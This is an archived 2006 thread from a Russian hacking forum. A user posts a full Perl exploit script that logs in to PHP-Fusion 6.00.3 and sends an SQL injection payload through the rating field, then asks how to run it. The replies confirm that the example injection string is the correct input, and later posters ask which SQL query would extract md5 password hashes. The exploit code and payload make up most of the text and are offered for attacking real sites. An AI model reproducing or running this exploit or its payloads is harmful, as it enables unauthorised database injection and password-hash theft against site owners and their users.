Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопрос по использованию сплоита для php-fusion 6.00.3 (https://forum.antichat.xyz/showthread.php?t=14781)

Romaxa55 20.02.2006 19:46

Вопрос по использованию сплоита для php-fusion 6.00.3
 
Парни сорри за ламерство но я уже не знаю что делать, значит вот сам сплоит.
Цитата:

#!/usr/bin/perl
#Exploit for PHP-Fusion 6.00.3 Released
#Coded by:krasza[krasza@gmail.com]
#Greetz: http://www.securityreason.com
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
if(!$ARGV[3]){
print<<EOF;
Exploit for PHP-Fusion 6.00.3 Released
Coded by krasza
Contact me:krasza\@gmail.com
Greets:
-http://www.securityreason.com
-http://www.revival.pl
-mulander

Usage:
perl phpfusion.pl url login pass sql
url-url hack site with [php fusion's directory]
login-your login
pass-your password
sql-[sql code]
Example:
\t perl phpfusion.pl http://server/php-fusion admin password 3','31337','HACKED')/*
EOF
exit;
}
my $url=shift;
my $login=shift;
my $haslo=shift;
my $sql=shift;
$url=$url."/news.php?readmore=1";
my $ua = new LWP::UserAgent;
$ua->agent("Exploit for PHP-Fusion" . $ua->agent);
$ua->cookie_jar( HTTP::Cookies->new('file' => 'ciasteczka.txt','autosave' => 1,));
print "[+]Connecting to $url...\n";

my $zadanie = new HTTP::Request POST => $url;
$zadanie->content_type('application/x-www-form-urlencoded');
$zadanie->content('user_name=' . $login . '&user_pass=' . $haslo . '&login=Loguj');
my $wynik = $ua->request($zadanie);
if ($wynik->is_success){
print "[+]Connected to $url\n";
#LOGIN JEST PRAWIDLOWE
}else{
print "[-]Connected failed to $url\n";
print "[-]Error:".$wynik->message."\n";
exit;
}
print "[+] Logging In $url...\n";
$zadanie = new HTTP::Request POST => $url;
$zadanie->content_type('application/x-www-form-urlencoded');
$zadanie->content('rating='.$sql.'&post_rating=Dodaj+ocen%E A');
my $wynik2 = $ua->request($zadanie);
if ($wynik2->is_success){
print "[+] Sql query isn't done!\n";
}else{
print "[-]Sql query is done\n";
}
Но никак не пойму что именно вводить.
perl phpfusion.pl http://server/php-fusion admin password 3','31337','HACKED')/* смущают последние строчки. Подскажите кто знает.

Inferno 20.02.2006 19:56

А что там смущает если там написано Example:
шо значит пример!

k1b0rg 20.02.2006 20:15

Цитата:

perl phpfusion.pl http://server/php-fusion admin password 3','31337','HACKED')/*
все правильно, он работает со скулей, все норма, так что вводи как показано в примере

Romaxa55 20.02.2006 21:45

Спасиб Киборк что понял меня правильно, сейчас опробую и вывешу результат и тему можно будет закрывать ;)

Mina 21.05.2006 00:13

A што дальше?
Код:

[-]Sql query is done

Zitt 21.05.2006 19:10

DimaHbl4 ну что может сплойт делать или позволяет выполнять команды или лог\пасс\хеш выдаёт

Susel 06.06.2006 03:09

Помогите.... Этот эксплоит приведённый выше, что делает.....добывает хеш??? Если да то, где он его сохраняет... После выполнения появляется файл тип лога, но там ни хрена нет... Help Please!!! )))

netadmin 07.08.2006 13:21

a kntonibud znait kakuiu sql query nada dla etava vipolnit shtob dastat md5 pwd


Время: 12:20